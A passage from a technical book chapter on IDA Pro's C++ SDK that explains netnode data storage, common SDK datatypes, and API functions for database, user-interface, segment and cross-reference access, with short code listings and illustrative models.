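Calling open_or_create twice with the same name yields the same number both times, which is the property that makes named netnodes convenient for data that must survive from one plug-in invocation to the next.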

Data Storage in Netnodes

Now that you understand how to create a netnode that you can store data into,

let’s return to the discussion of the internal array storage capability of net-

nodes. To store a value into an array within a netnode, we need to specify five

pieces of information: an index value, an index size (8 or 32 bits), a value

to store, the number of bytes the value contains, and an array (one of 256

available for each category of array) in which to store the value. The index

size parameter is specified implicitly by the function that we use to store or

retrieve the data. The remaining values are passed into that function as

parameters. The parameter that selects which of the 256 possible arrays a

value is stored in is usually called a tag, and it is often specified (though it

need not be) using a character. The netnode documentation distinguishes

among a few special types of values termed altvals, supvals, and hashvals. By

default, each of these values is typically associated with a specific array tag: 'A'

for altvals, 'S' for supvals, and 'H' for hashvals. A fourth type of value, called

a charval, is not associated with any specific array tag.

It is important to understand that these value types are associated more

with a specific way of storing data into a netnode than with a specific array

within a netnode. It is possible to store any type of value in any array simply by

specifying an alternate array tag when storing data. In all cases, it is up to you

to remember what type of data you stored into a particular array location so

that you can use retrieval methods appropriate to the type of the stored data.
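The addressing scheme just described can be pictured with a small stand-alone model. The sketch below is not SDK code: ToyNetnode, store, and load are hypothetical names, and a std::map stands in for IDA's database storage. It only illustrates that a stored value is located by the pair (array tag, index) and that it is the caller's job to remember what was stored where.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <map>
#include <utility>
#include <vector>

// Hypothetical stand-in for a netnode; NOT part of the IDA SDK.
// Each value lives in one of 256 arrays (selected by tag) at an integer index.
class ToyNetnode {
public:
    // Store len bytes at arrays[tag][index], replacing any previous value.
    void store(unsigned char tag, uint32_t index, const void *data, size_t len) {
        assert(data != nullptr && len > 0);
        const unsigned char *p = static_cast<const unsigned char *>(data);
        cells_[std::make_pair(tag, index)] = std::vector<unsigned char>(p, p + len);
    }

    // Copy up to bufsize bytes out; returns bytes copied, or -1 if nothing is stored.
    long load(unsigned char tag, uint32_t index, void *buf, size_t bufsize) const {
        auto it = cells_.find(std::make_pair(tag, index));
        if (it == cells_.end()) return -1;
        size_t n = it->second.size() < bufsize ? it->second.size() : bufsize;
        if (n > 0) std::memcpy(buf, it->second.data(), n);
        return static_cast<long>(n);
    }

private:
    std::map<std::pair<unsigned char, uint32_t>, std::vector<unsigned char>> cells_;
};
```

In this model, storing a 4-byte integer under tag 'A' and index 1000 and then asking for tag 3 at the same index finds nothing, because the tag selects a different array.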

Altvals provide a simple interface for storing and retrieving integer data

in netnodes. Altvals may be stored into any array within a netnode but default

to the 'A' array. Regardless of which array you wish to store integers into, using

the altval-related functions greatly simplifies matters. The code in Listing 16-2

demonstrates data storage and retrieval using altvals.

netnode n("$ idabook", 0, true); //create the netnode if it doesn't exist

sval_t index = 1000; //sval_t is a 32 bit type, this example uses 32-bit indexes

ulong value = 0x12345678;

n.altset(index, value); //store value into the 'A' array at index

value = n.altval(index); //retrieve value from the 'A' array at index

n.altset(index, value, (char)3); //store into array 3

value = n.altval(index, (char)3); //read from array 3

Listing 16-2: Accessing netnode altvals

In this example, you see a pattern that will be repeated for other types of

netnode values, namely, the use of an XXXset function (in this case, altset) to

store a value into a netnode and an XXXval function (in this case, altval) to

retrieve a value from a netnode. If we want to store integers into arrays using

8-bit index values, we need to use slightly different functions, as shown in the

next example.

netnode n("$ idabook", 0, true);

uchar index = 80; //this example uses 8-bit index values

ulong value = 0x87654321;

n.altset_idx8(index, value, 'A'); //store, no default tags with xxx_idx8 functions

value = n.altval_idx8(index, 'A'); //retrieve value from the 'A' array at index

n.altset_idx8(index, value, (char)3); //store into array 3

value = n.altval_idx8(index, (char)3); //read from array 3

Here you see that the general rule of thumb for the use of 8-bit index

values is to use a function with an _idx8 suffix. Also note that none of the

_idx8 functions provide default values for the array tag parameter.

Supvals represent the most versatile means of storing and retrieving

data in netnodes. Supvals represent data of arbitrary size, from 1 byte to a

maximum of 1,024 bytes. When using 32-bit index values, the default array

for storing and retrieving supvals is the 'S' array. Again, however, supvals can

be stored into any of the 256 available arrays by specifying an appropriate

array tag value. Strings are a common form of arbitrary length data and as

such are afforded special handling in supval manipulation functions. The

code in Listing 16-3 provides examples of storing supvals into a netnode.

netnode n("$ idabook", 0, true); //create the netnode if it doesn't exist

const char *string_data = "example supval string data";

unsigned char binary_data[] = {0xfe, 0xdc, 0x4e, 0xc7, 0x90, 0x00, 0x13, 0x8a,

                               0x33, 0x19, 0x21, 0xe5, 0xaa, 0x3d, 0xa1, 0x95};

//store binary_data into the 'S' array at index 1000, we must supply a

//pointer to data and the size of the data

n.supset(1000, binary_data, sizeof(binary_data));

//store string_data into the 'S' array at index 1001. If no size is supplied,

//or size is zero, the data size is computed as: strlen(data) + 1

n.supset(1001, string_data);

//store into an array other than 'S' (200 in this case) at index 500

n.supset(500, binary_data, sizeof(binary_data), (char)200);

Listing 16-3: Storing netnode supvals

The supset function requires an array index, a pointer to some data, the

length of the data (in bytes), and an array tag that defaults to 'S' if omitted.

If the length parameter is omitted, it defaults to zero. When the length is

specified as zero, supset assumes that the data being stored is a string,

computes the length of the data as strlen(data) + 1, and stores a null termination

character along with the string data.

Retrieving data from a supval takes a little care, as you may not know the

amount of data contained within the supval before you attempt to retrieve it.

When you retrieve data from a supval, bytes are copied out of the netnode

into a user-supplied output buffer. How do you ensure that your output

buffer is of sufficient size to receive the supval data? The first method is to

retrieve all supval data into a buffer that is at least 1,024 bytes. The second

method is to preset the size of your output buffers by querying the size of the

supval. Two functions are available for retrieving supvals. The supval function

is used to retrieve arbitrary data, while the supstr function is specialized for

retrieving string data. Each of these functions expects a pointer to your output

buffer along with the size of the buffer. The return value for supval is the

number of bytes copied into the output buffer, while the return value for

supstr is the length of the string copied to the output buffer not including

the null terminator, even though the null terminator is copied to the buffer.

Each of these functions recognizes the special case in which a NULL pointer

is supplied in place of an output buffer pointer. In such cases, supval and

supstr return the number of bytes of storage (including any null terminator)

required to hold the supval data. Listing 16-4 demonstrates retrieval of supval

data using the supval and supstr functions.

//determine size of element 1000 in 'S' array. The NULL pointer indicates

//that we are not supplying an output buffer

int len = n.supval(1000, NULL, 0);

char *outbuf = new char[len]; //allocate a buffer of sufficient size

n.supval(1000, outbuf, len); //extract data from the supval

//determine size of element 1001 in 'S' array. The NULL pointer indicates

//that we are not supplying an output buffer.

len = n.supstr(1001, NULL, 0);

char *outstr = new char[len]; //allocate a buffer of sufficient size

n.supstr(1001, outstr, len); //extract the string from the supval

//retrieve a supval from array 200, index 500

char buf[1024];

len = n.supval(500, buf, sizeof(buf), (char)200);

Listing 16-4: Retrieving netnode supvals
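The query-then-copy pattern used in Listing 16-4 can be tried outside of IDA with a small model. In the sketch below, toy_supval and fetch_all are hypothetical names; toy_supval only mimics the behavior described in the text (a NULL buffer yields the required size) and is not the SDK's implementation.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>
#include <vector>

// Hypothetical model of the behavior described in the text; NOT the SDK's supval.
// With a NULL buffer it reports the number of bytes required; otherwise it
// copies at most bufsize bytes and returns the number copied.
long toy_supval(const std::vector<char> &stored, void *buf, size_t bufsize) {
    if (buf == nullptr) return static_cast<long>(stored.size());
    size_t n = stored.size() < bufsize ? stored.size() : bufsize;
    if (n > 0) std::memcpy(buf, stored.data(), n);
    return static_cast<long>(n);
}

// Query the size first, then allocate exactly that much and copy.
std::vector<char> fetch_all(const std::vector<char> &stored) {
    long len = toy_supval(stored, nullptr, 0);
    assert(len >= 0);
    std::vector<char> out(static_cast<size_t>(len));
    long copied = toy_supval(stored, out.data(), out.size());
    assert(copied == len);
    return out;
}
```

Using a std::vector for the output buffer is a design choice of this sketch: it releases its memory automatically, whereas buffers obtained with new char[len] must eventually be freed with delete[].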

Using supvals, it is possible to access any data stored in any array within a

netnode. For example, supval functions can be used to store and retrieve altval

data by limiting the supset and supval operations to the size of an altval.

Reading through netnode.hpp, you will see that this is in fact the case by observing

the inlined implementation of the altset function, as shown here:

bool altset(sval_t alt, nodeidx_t value, char tag=atag) {

return supset(alt, &value, sizeof(value), tag);

}

Hashvals offer yet another interface to netnodes. Rather than being

associated with integer indexes, hashvals are associated with key strings.

Overloaded versions of the hashset function make it easy to associate integer

data or array data with a hash key, while the hashval, hashstr, and hashval_long

functions allow retrieval of hashvals when provided with the appropriate hash

key. Tag values associated with the hashXXX functions actually choose one of

256 hash tables, with the default table being 'H'. Alternate tables are selected

by specifying a tag other than 'H'.

The last interface to netnodes that we will mention is the charval interface.

The charval and charset functions offer a simple means to store single-byte

data into a netnode array. There is no default array associated with charval

storage and retrieval, so you must specify an array tag for every charval

operation. Charvals are stored into the same arrays as altvals and supvals, and the

charval functions are simply wrappers around 1-byte supvals.

Another capability provided by the netnode class is the ability to iterate

over the contents of a netnode array (or hash table). Iteration is performed

using XXX1st, XXXnxt, XXXlast, and XXXprev functions that are available for

altvals, supvals, hashvals, and charvals. The example in Listing 16-5 illustrates

iteration across the default altvals array ('A').

Iteration over supvals, charvals, and hashvals is performed in a very similar

manner; however, you will find that the syntax varies depending on the type

of values being accessed. For example, iteration over hashvals returns hashkeys

rather than array indexes, which must then be used to retrieve hashvals.

netnode n("$ idabook", 0, true);

//Iterate altvals first to last

for (nodeidx_t idx = n.alt1st(); idx != BADNODE; idx = n.altnxt(idx)) {

ulong val = n.altval(idx);

msg("Found altval['A'][%d] = %d\n", idx, val);

}

//Iterate altvals last to first

for (nodeidx_t idx = n.altlast(); idx != BADNODE; idx = n.altprev(idx)) {

ulong val = n.altval(idx);

msg("Found altval['A'][%d] = %d\n", idx, val);

}

Listing 16-5: Enumerating netnode altvals

Deleting Netnodes and Netnode Data

The netnode class also provides functions for deleting individual array elements,

the entire contents of an array, or the entire contents of a netnode. Removing

an entire netnode is fairly straightforward.

netnode n("$ idabook", 0, true);

n.kill(); //entire contents of n are deleted

When deleting individual array elements, or entire array contents, you

must take care to choose the proper deletion function because the names of

the functions are very similar and choosing the wrong form may result in

significant loss of data. Commented examples demonstrating deletion of

altvals follow:

netnode n("$ idabook", 0, true);

n.altdel(100); //(2) delete item 100 from the default altval array ('A')

n.altdel(100, (char)3); //delete item 100 from altval array 3

n.altdel(); //(1) delete the entire contents of the default altval array

n.altdel_all('A'); //alternative to delete default altval array contents

n.altdel_all((char)3); //delete the entire contents of altval array 3

Note the similarity in the syntax to delete the entire contents of the default

altval array (1) and the syntax to delete a single element from the default altval

array (2). If for some reason you fail to specify an index when you want to delete

a single element, you may end up deleting an entire array. Similar functions

exist to delete supval, charval, and hashval data.
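The hazard comes from two functions sharing one name and differing only in whether an index is passed. The following stand-alone sketch models that situation; ToyAltArray and count are hypothetical, and the class is an illustration only, not the SDK's netnode.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>

// Hypothetical model of one altval array; NOT the SDK's netnode class.
class ToyAltArray {
public:
    void altset(uint32_t index, uint32_t value) { vals_[index] = value; }

    // Delete a single element; returns true if something was removed.
    bool altdel(uint32_t index) { return vals_.erase(index) == 1; }

    // Same name, no index: wipes the whole array.
    void altdel() { vals_.clear(); }

    size_t count() const { return vals_.size(); }

private:
    std::map<uint32_t, uint32_t> vals_;
};
```

Both calls compile without complaint, so the compiler offers no protection against a forgotten index. A code review habit of checking every argument-free deletion call is one inexpensive safeguard.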

NETNODES AND IDC GLOBAL ARRAYS

You may recall from Chapter 15 that the IDC scripting language provides persistent

global arrays. Netnodes provide the backing storage for IDC global arrays. When

you supply a name to the IDC CreateArray function, the string $ idc_array is

prepended to the name that you supply to form a netnode name. The netnodenumber

of the newly created netnode is returned to you as the IDC array identifier. The

IDC SetArrayLong function stores an integer into the altvals ('A') array, while the

SetArrayString function stores a string into the supvals ('S') array. When you

retrieve a value from an IDC array using the GetArrayElement function, the tags that

you supply (AR_LONG or AR_STR) represent the tags to the altval and supval arrays used

to store the corresponding integer or string data.

Appendix B offers additional insight into the use of netnodes within the

implementations of IDC functions and exposes how netnodes are used to store various types

of information (such as comments) within a database.

Useful SDK Datatypes

IDA’s API defines a number of C++ classes designed to model components

typically found in executable files. The SDK contains classes to describe

functions, program sections, data structures, individual assembly language

instructions, and individual operands within each instruction. Additional

classes are defined to implement the tools that IDA uses to manage the

disassembly process. Classes falling into this latter category define general

database characteristics, loader module characteristics, processor module

characteristics, and plug-in module characteristics, and they define the

assembly syntax to be used for each disassembled instruction.

Some of the more common general-purpose classes are described here.

We defer discussion of classes that are more specific to plug-ins, loaders, and

processor modules until the appropriate chapters covering those topics.

Our goal here is to introduce classes, their purposes, and some important

data members of each class. Useful functions for manipulating each class are

described in “Commonly Used SDK Functions.”

area_t (area.hpp)

This struct describes a range of addresses and is the base class for several

other classes. The struct contains two data members, startEA (inclusive)

and endEA (exclusive), that define the boundaries of the address range.

Member functions are defined that compute the size of the address

range and that can perform comparisons between two areas.

func_t (funcs.hpp)

This class inherits from area_t. Additional data fields are added to the

class to record binary attributes of the function, such as whether the

function uses a frame pointer or not, and attributes describing the

function’s local variables and arguments. For optimization purposes,

some compilers may split functions into several noncontiguous regions

within a binary. IDA terms these regions chunks or tails. The func_t class

is also used to describe tail chunks.

segment_t (segment.hpp)

The segment_t class is another subclass of area_t. Additional data fields

describe the name of the segment, the permissions in effect in the

segment (readable, writeable, executable), the type of the segment

(code, data, etc.), and the number of bits used in a segment address

(16, 32, or 64).

idc_value_t (expr.hpp)

This class describes the contents of an IDC value, which may contain at

any time a string, an integer, or a floating-point value. The type is utilized

extensively when interacting with IDC functions from within a compiled

module.

idainfo (ida.hpp)

This struct is populated with characteristics describing the open

database. A single global variable named inf, of type idainfo, is declared in

ida.hpp. Fields within this struct describe the name of the processor

module that is in use, the input file type (such as f_PE or f_MACHO via the

filetype_t enum), the program entry point (beginEA), the minimum

address within the binary (minEA), the maximum address in the binary

(maxEA), the endianness of the current processor (mf), and a number of

configuration settings parsed from ida.cfg.

struc_t (struct.hpp)

This class describes the layout of structured data within a disassembly. It

is used to describe structures within the Structures window as well as to

describe the composition of function stack frames. A struc_t contains

flags describing attributes of the structure (such as whether it is a

structure or union or whether the structure is collapsed or expanded in the

IDA display window), and it also contains an array of structure members.

member_t (struct.hpp)

This class describes a single member of a structured datatype. Included

data fields describe the byte offset at which the member begins and ends

within its parent structure.

op_t (ua.hpp)

This class describes a single operand within a disassembled instruction.

The class contains a zero-based field to store the number of the operand

(n), an operand type field (type), and a number of other fields whose

meaning varies depending on the operand type. The type field is set to

one of the optype_t constants defined in ua.hpp and describes the operand

type or addressing mode used for the operand.

insn_t (ua.hpp)

This class contains information describing a single disassembled

instruction. Fields within the class describe the instruction’s address within the

disassembly (ea), the instruction’s type (itype), the instruction’s length

in bytes (size), and an array of six possible operand values (Operands) of

type op_t (IDA limits each instruction to a maximum of six operands).

The itype field is set by the processor module. For standard IDA processor

modules, the itype field is set to one of the enumerated constants defined

in allins.hpp. When a third-party processor module is used, the list of

potential itype values must be obtained from the module developer.

Note that the itype field generally bears no relationship whatsoever to

the binary opcode for the instruction.

The preceding list is by no means a definitive guide to all of the datatypes

used within the SDK. This list is intended merely as an introduction to some

of the more commonly used classes and some of the more commonly accessed

fields within those classes.
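The half-open address range that area_t represents, and the way func_t and segment_t build on it, can be sketched in a few lines. The types below (toy_ea_t, ToyArea, ToyFunc) and the contains helper are hypothetical stand-ins written for this illustration; the real definitions live in area.hpp and funcs.hpp and carry many more fields.

```cpp
#include <cassert>
#include <cstdint>

typedef uint32_t toy_ea_t;  // hypothetical stand-in for the SDK's ea_t

// Hypothetical model of a half-open address range; NOT the SDK's area_t.
struct ToyArea {
    toy_ea_t startEA;  // first address in the range (inclusive)
    toy_ea_t endEA;    // first address past the range (exclusive)

    toy_ea_t size() const {
        assert(endEA >= startEA);
        return endEA - startEA;
    }
    bool contains(toy_ea_t ea) const { return startEA <= ea && ea < endEA; }
};

// A derived type adds attributes, as func_t and segment_t do with area_t.
struct ToyFunc : ToyArea {
    bool uses_frame_pointer;
};
```

Because endEA is exclusive, a function occupying 0x401000 through 0x40101F has endEA set to 0x401020 and a size of 0x20, with no off-by-one adjustment needed.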

Commonly Used SDK Functions

While the SDK is programmed using C++ and defines a number of C++ classes,

in many cases the SDK favors traditional C-style nonmember functions for

manipulation of objects within a database. For most API datatypes, it is more

common to find nonmember functions that require a pointer to an object

than it is to find a member function to manipulate the object in the manner

you desire.

In the summaries that follow, we cover API functions that provide

functionality similar to many of the IDC functions introduced in Chapter 15. It is

unfortunate that functions that perform identical tasks are named one thing

in IDC and something different within the API.

Basic Database Access

The following functions, declared in bytes.hpp, provide access to individual

bytes, words, and dwords within a database.

uchar get_byte(ea_t addr) Reads current byte value from virtual

address addr.

ushort get_word(ea_t addr) Reads current word value from virtual

address addr.

ulong get_long(ea_t addr) Reads current double word value from virtual

address addr.

get_many_bytes(ea_t addr, void *buffer, ssize_t len) Copies len bytes

from the addr into the supplied buffer.

patch_byte(ea_t addr, ulong val) Sets a byte value at virtual address addr.

patch_word(ea_t addr, ulonglong val) Sets a word value at virtual

address addr.

patch_long(ea_t addr, ulonglong val) Sets a double word value at virtual

address addr.

patch_many_bytes(ea_t addr, const void *buffer, size_t len) Patches the

database beginning at addr with len bytes from the user-supplied buffer.

ulong get_original_byte(ea_t addr) Reads the original byte value (prior

to patching) from virtual address addr.

ulonglong get_original_word(ea_t addr) Reads the original word value

from virtual address addr.

ulonglong get_original_long(ea_t addr) Reads the original double word

value from virtual address addr.

bool isLoaded(ea_t addr) Returns true if addr contains valid data, false

otherwise.

Additional functions exist for accessing alternative data sizes. Note that

the get_original_XXX functions get the very first original value, which is not

necessarily the value at an address prior to a patch. Consider the case when a

byte value is patched twice; over time this byte has held three different values.

After the second patch, both the current value and the original value are

accessible, but there is no way to obtain the second value (which was set with

the first patch).
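The double-patch scenario can be reproduced with a toy model that keeps only two values per address: the current one and the very first one. The class ToyPatchDb and its load_byte method are hypothetical; the remaining method names merely echo the SDK functions they imitate and do not show how IDA stores patch data.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <utility>

// Hypothetical model of the patching behavior described above; NOT SDK code.
// Only the first (original) value and the current value of a byte are kept.
class ToyPatchDb {
public:
    void load_byte(uint32_t ea, uint8_t v) { current_[ea] = v; }

    void patch_byte(uint32_t ea, uint8_t v) {
        assert(current_.count(ea) == 1);  // only loaded addresses can be patched
        // insert() leaves an existing entry untouched, so the saved original
        // is recorded on the first patch only.
        original_.insert(std::make_pair(ea, current_[ea]));
        current_[ea] = v;
    }

    uint8_t get_byte(uint32_t ea) const { return current_.at(ea); }

    uint8_t get_original_byte(uint32_t ea) const {
        auto it = original_.find(ea);
        return it != original_.end() ? it->second : current_.at(ea);
    }

private:
    std::map<uint32_t, uint8_t> current_;
    std::map<uint32_t, uint8_t> original_;
};
```

Loading 0x11, then patching to 0x22 and again to 0x33, leaves 0x33 as the current value and 0x11 as the original; the intermediate 0x22 is no longer stored anywhere.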

User Interface Functions

Interaction with the IDA user interface is handled by a single dispatcher

function named callui. Requests for various user interface services are made by

passing a user interface request (one of the enumerated ui_notification_t

constants) to callui along with any additional parameters required by

the request. Parameters required for each request type are specified in

kernwin.hpp. Fortunately, a number of convenience functions that hide

many of the details of using callui directly are also defined in kernwin.hpp.

Several common convenience functions are described here:

msg(char *format, ...) Prints a formatted message to the message

window. This function is analogous to C’s printf function and accepts

a printf-style format string.

warning(char *format, ...) Displays a formatted message in a dialog.

char *askstr(int hist, char *default, char *format, ...) Displays an

input dialog asking the user to enter a string value. The hist parameter

dictates how the drop-down history list in the dialog should be populated

and should be set to one of the HIST_xxx constants defined in kernwin.hpp.

The format string and any additional parameters are used to form a

prompt string.

char *askfile_c(int dosave, char *default, char *prompt, ...) Displays a

file save (dosave = 1) or file open (dosave = 0) dialog, initially displaying the

directory and file mask specified by default (such as C:\\windows\\*.exe).

Returns the name of the selected file or NULL if the dialog was canceled.

askyn_c(int default, char *prompt, ...) Prompts the user with a yes or

no question, highlighting a default answer (1 = yes, 0 = no, −1 = cancel).

Returns an integer representing the selected answer.

AskUsingForm_c(const char *form, ...) The form parameter is an ASCII

string specification of a dialog and its associated input elements. This

function may be used to build customized user interface elements when

none of the SDK’s other convenience functions meet your needs. The

format of the form string is detailed in kernwin.hpp.

get_screen_ea() Returns the virtual address of the current cursor

location.

jumpto(ea_t addr) Jumps the disassembly window to the specified

address.

Many more user interface capabilities are available using the API than are

available with IDC scripting, including the ability to create customized single-

and multicolumn list selection dialogs. Users interested in these capabilities

should consult kernwin.hpp and the choose and choose2 functions in particular.

Manipulating Database Names

The following functions are available for working with named locations within

a database:

get_name(ea_t from, ea_t addr, char *namebuf, size_t maxsize)

Returns the name associated with addr. Returns the empty string if the

location has no name. This function provides access to local names when

from is any address in the function that contains addr. The name is copied

into the provided output buffer.

set_name(ea_t addr, char *name, int flags) Assigns the given name to the

given address. The name is created with attributes specified in the flags

bitmask. Possible flag values are described in name.hpp.

get_name_ea(ea_t funcaddr, char *localname) Searches for the given local

name within the function containing funcaddr. Returns the address of

the name or BADADDR (−1) if no such name exists in the given function.

Function Manipulation

The API functions for accessing information about disassembled functions

are declared in funcs.hpp. Functions for accessing stack frame information are

declared in frame.hpp. Some of the more commonly used functions are

described here:

func_t *get_func(ea_t addr) Returns a pointer to a func_t object that

describes the function containing the indicated address.

size_t get_func_qty() Returns the number of functions present in the

database.

func_t *getn_func(size_t n) Returns a pointer to a func_t object that

represents the nth function in the database where n is between zero

(inclusive) and get_func_qty() (exclusive).

func_t *get_next_func(ea_t addr) Returns a pointer to a func_t object

that describes the next function following the specified address.

get_func_name(ea_t addr, char *name, size_t namesize) Copies the name

of the function containing the indicated address into the supplied name

buffer.

struc_t *get_frame(ea_t addr) Returns a pointer to a struc_t object that

describes the stack frame for the function that contains the indicated

address.

Structure Manipulation

The struc_t class is used to access function stack frames as well as structured

datatypes defined within type libraries. Some of the basic functions for

interacting with structures and their associated members are described here.

Many of these functions make use of a type ID (tid_t) datatype. The API

includes functions for mapping a struc_t to an associated tid_t and vice

versa. Note that both the struc_t and member_t classes contain a tid_t data

member, so obtaining type ID information is simple if you already have a

pointer to a valid struc_t or member_t object.

tid_t get_struc_id(char *name) Looks up the type ID of a structure given

its name.

struc_t *get_struc(tid_t id) Obtains a pointer to a struc_t representing

the structure specified by the given type ID.

asize_t get_struc_size(struc_t *s) Returns the size of the given

structure in bytes.

member_t *get_member(struc_t *s, asize_t offset) Returns a pointer to a

member_t object that describes the structure member that resides at the

specified offset into the given structure.

member_t *get_member_by_name(struc_t *s, char *name) Returns a pointer

to a member_t object that describes the structure member identified by the

given name.

tid_t add_struc(uval_t index, char *name, bool is_union=false)

Appends a new structure with the given name into the standard structures

list. The structure is also added to the Structures window at the given

index. If index is BADADDR, the structure is added as the last structure in the

Structures window.

add_struc_member(struc_t *s, char *name, ea_t offset, flags_t flags,

typeinfo_t *info, asize_t size) Adds a new member with the given name

to the given structure. The member is either added at the indicated

offset within the structure or appended to the end of the structure

if offset is BADADDR. The flags parameter describes the datatype of the

new member. Valid flags are defined using the FF_XXX constants described

in bytes.hpp. The info parameter provides additional information for

complex datatypes; it may be set to NULL for primitive datatypes. The typeinfo_t

datatype is defined in nalt.hpp. The size parameter specifies the number

of bytes occupied by the new member.

Segment Manipulation

The segment_t class stores information related to the different segments

within a database (such as .text and .data) as listed in the View ▸ Open

Subviews ▸ Segments window. Recall that what IDA terms segments are often

referred to as sections by various executable file formats such as PE and ELF.

The following functions provide basic access to segment_t objects. Additional

functions dealing with the segment_t class are declared in segment.hpp.

segment_t *getseg(ea_t addr) Returns a pointer to the segment_t object

that contains the given address.

segment_t *get_segm_by_name(char *name) Returns a pointer to

the segment_t object with the given name.

add_segm(ea_t para, ea_t start, ea_t end, char *name, char *sclass)

Creates a new segment in the current database. The segment’s

boundaries are specified with the start (inclusive) and end (exclusive) address

parameters, while the segment’s name is specified by the name parameter.

The segment’s class loosely describes the type of segment being created.

Predefined classes include CODE and DATA. A complete list of predefined

classes may be found in segment.hpp. The para parameter describes the

base address of the section when segmented addresses (seg:offset) are

being used, in which case start and end are interpreted as offsets rather

than as virtual addresses. When segmented addresses are not being used,

or all segments are based at 0, this parameter should be set to 0.

add_segm_ex(segment_t *s, char *name, char *sclass, int flags)

Alternate method for creating new segments. The fields of s should be

set to reflect the address range of the segment. The segment is named

and typed according to the name and sclass parameters. The flags

parameter should be set to one of the ADDSEG_XXX values defined in segment.hpp.

int get_segm_qty() Returns the number of sections present within the

database.

segment_t *getnseg(int n) Returns a pointer to a segment_t object

populated with information about the nth program section in the

database.

int set_segm_name(segment_t *s, char *name, ...) Changes the name of

the given segment. The name is formed by treating name as a format string

and incorporating any additional parameters as required by the format

string.

get_segm_name(ea_t addr, char *name, size_t namesize) Copies the name

of the segment containing the given address into the user-supplied name

buffer. Note the name may be filtered to replace characters that IDA

considers invalid (characters not specified as NameChars in ida.cfg) with a

dummy character (typically an underscore as specified by SubstChar in

ida.cfg).

get_segm_name(segment_t *s, char *name, size_t namesize) Copies the

potentially filtered name of the given segment into the user-supplied

name buffer.

get_true_segm_name(segment_t *s, char *name, size_t namesize) Copies the

exact name of the given segment into the user-supplied name buffer

without filtering any characters.

One of the add_segm functions must be used to actually create a

segment. Simply declaring and initializing a segment_t object does not

actually create a segment within the database. This is true with all of the

wrapper classes such as func_t and struc_t. These classes merely provide

a convenient means to access attributes of an underlying database entity.

The appropriate functions to create, modify, or delete actual database

objects must be utilized in order to make persistent changes to the

database.
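The difference between get_segm_name and get_true_segm_name noted earlier comes down to character filtering. The sketch below shows one plausible way such filtering could work; toy_filter_name and its parameters are hypothetical, and the allowed-character set passed in by the caller merely plays the role that NameChars plays in ida.cfg.

```cpp
#include <cassert>
#include <string>

// Hypothetical sketch of name filtering; NOT the SDK's implementation.
// Every character not found in `allowed` is replaced with `subst`.
std::string toy_filter_name(const std::string &name,
                            const std::string &allowed,
                            char subst = '_') {
    // The substitute character must itself be a valid name character.
    assert(allowed.find(subst) != std::string::npos);
    std::string out = name;
    for (char &c : out) {
        if (allowed.find(c) == std::string::npos) c = subst;
    }
    return out;
}
```

With an allowed set of lowercase letters plus the underscore, the name .text is filtered to _text, while data passes through unchanged.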

Code Cross-References

A number of functions and enumerated constants are defined in xref.hpp for

use with code cross-references. Some of these are described here:

get_first_cref_from(ea_t from) Returns the first location to which the

given address transfers control. Returns BADADDR (−1) if the given

address refers to no other addresses.

get_next_cref_from(ea_t from, ea_t current) Returns the next location

to which the given address (from) transfers control, given that current

has already been returned by a previous call to get_first_cref_from or

get_next_cref_from. Returns BADADDR if no more cross-references exist.

get_first_cref_to(ea_t to) Returns the first location that transfers

control to the given address. Returns BADADDR (−1) if there are no

references to the given address.

get_next_cref_to(ea_t to, ea_t current) Returns the next location that

transfers control to the given address (to), given that current has already

been returned by a previous call to get_first_cref_to or get_next_cref_to.

Returns BADADDR if no more cross-references to the given location exist.
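The first/next functions above share one calling pattern: start with the first result, pass each result back in to get the next, and stop at the BADADDR sentinel. The stand-alone model below imitates that pattern. All names beginning with toy_ or Toy are hypothetical, and the model assumes targets are handed back in ascending address order, which is a property of this sketch rather than a documented guarantee of the SDK.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <set>
#include <vector>

typedef uint32_t toy_ea_t;                  // hypothetical stand-in for ea_t
const toy_ea_t TOY_BADADDR = toy_ea_t(-1);  // sentinel, mirroring BADADDR (-1)

// Hypothetical cross-reference table: source address -> sorted set of targets.
typedef std::map<toy_ea_t, std::set<toy_ea_t>> ToyXrefs;

toy_ea_t toy_first_cref_from(const ToyXrefs &x, toy_ea_t from) {
    auto it = x.find(from);
    if (it == x.end() || it->second.empty()) return TOY_BADADDR;
    return *it->second.begin();
}

toy_ea_t toy_next_cref_from(const ToyXrefs &x, toy_ea_t from, toy_ea_t current) {
    auto it = x.find(from);
    if (it == x.end()) return TOY_BADADDR;
    auto next = it->second.upper_bound(current);  // first target after current
    return next == it->second.end() ? TOY_BADADDR : *next;
}

// Collect every target by looping until the sentinel is returned.
std::vector<toy_ea_t> toy_all_crefs_from(const ToyXrefs &x, toy_ea_t from) {
    assert(from != TOY_BADADDR);
    std::vector<toy_ea_t> out;
    for (toy_ea_t t = toy_first_cref_from(x, from); t != TOY_BADADDR;
         t = toy_next_cref_from(x, from, t)) {
        out.push_back(t);
    }
    return out;
}
```

The same loop shape applies to the cref_to variants and to the data cross-reference functions; only the function names change.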

Data Cross-References

The functions for accessing data cross-reference information (also declared

in xref.hpp) are very similar to the functions used to access code cross-reference

information. These functions are described here:

get_first_dref_from(ea_t from) Returns the first location that the

given address refers to as data. Returns BADADDR (−1) if the given

address refers to no other addresses.

get_next_dref_from(ea_t from, ea_t current) Returns the next location

that the given address (from) refers to as data, given that current

has already been returned by a previous call to get_first_dref_from or

get_next_dref_from. Returns BADADDR if no more cross-references exist.

get_first_dref_to(ea_t to) Returns the first location that refers to the

given address as data. Returns BADADDR (−1) if there are no references

to the given address.

get_next_dref_to(ea_t to, ea_t current) Returns the next location that

refers to the given address (to) as data, given that current has already

been returned by a previous call to get_first_dref_to or get_next_dref_to.

Returns BADADDR if no more cross-references to the given location exist.

The SDK contains no equivalent to IDC’s XrefType function. A variable

named lastXR is declared in xref.hpp; however, it is not exported. If you need

to determine the exact type of a cross-reference, you must iterate cross-

references using an xrefblk_t structure. The xrefblk_t is described in

“Enumerating Cross-References” on page 311.
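The first/next convention shared by all of these functions can be tried out away from IDA. The following is only a sketch: mock_ea_t, MOCK_BADADDR, xref_table_t, and the mock_ functions are hypothetical stand-ins written for this illustration, not SDK symbols, and the ascending order in which the toy table yields referrers is an assumption of the mock.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <set>
#include <vector>

// Hypothetical stand-ins for the SDK's ea_t and BADADDR.
typedef std::uint64_t mock_ea_t;
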